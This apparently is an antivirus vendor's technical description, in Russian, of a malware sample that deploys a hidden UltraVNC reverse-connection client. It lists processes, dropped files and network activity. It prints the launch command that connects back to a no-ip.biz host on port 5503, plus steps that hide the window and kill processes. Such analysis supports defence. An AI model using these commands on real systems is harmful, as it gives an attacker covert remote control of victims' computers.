Техническая информация
- '%TEMP%\7zS1.tmp\winvnc.exe' -sc_prompt -connect toshibabl.no-ip.biz::5503 -autoreconnect -run
- '%TEMP%\7zS1.tmp\winvnc.exe' -stopservice
- '%TEMP%\7zS1.tmp\nircmdc.exe' win hide ititle "scvnc_start"
- '<SYSTEM32>\net.exe' stop "uvnc_service"
- '<SYSTEM32>\net1.exe' stop "uvnc_service"
- '<SYSTEM32>\ping.exe' -n 1 localhost
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7zS1.tmp\winvnc.cmd" "
- '<SYSTEM32>\taskkill.exe' /F /IM winvnc.exe
- '<SYSTEM32>\tskill.exe' winvnc /A /V
- %TEMP%\7zS1.tmp\SCHook.dll
- %TEMP%\7zS1.tmp\logmessages.dll
- %TEMP%\7zS1.tmp\logging.dll
- %TEMP%\7zS1.tmp\vnchooks.dll
- %TEMP%\7zS1.tmp\winvnc.exe
- %TEMP%\7zS1.tmp\nircmdcx64.exe
- %TEMP%\7zS1.tmp\workgrpdomnt4.dll
- %TEMP%\7zS1.tmp\ldapauth.dll
- %TEMP%\7zS1.tmp\ultravnc.ini
- %TEMP%\7zS1.tmp\MSRC4Plugin.dsm
- %TEMP%\7zS1.tmp\rc4.key
- %TEMP%\7zS1.tmp\winvnc.cmd
- %TEMP%\7zS1.tmp\authSSP.dll
- %TEMP%\7zS1.tmp\authadmin.dll
- %TEMP%\7zS1.tmp\nircmdc.exe
- 'to####abl.no-ip.biz':5503
- 'localhost':5900
- DNS ASK to####abl.no-ip.biz
- ClassName: 'WinVNC Tray Icon' WindowName: '(null)'
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'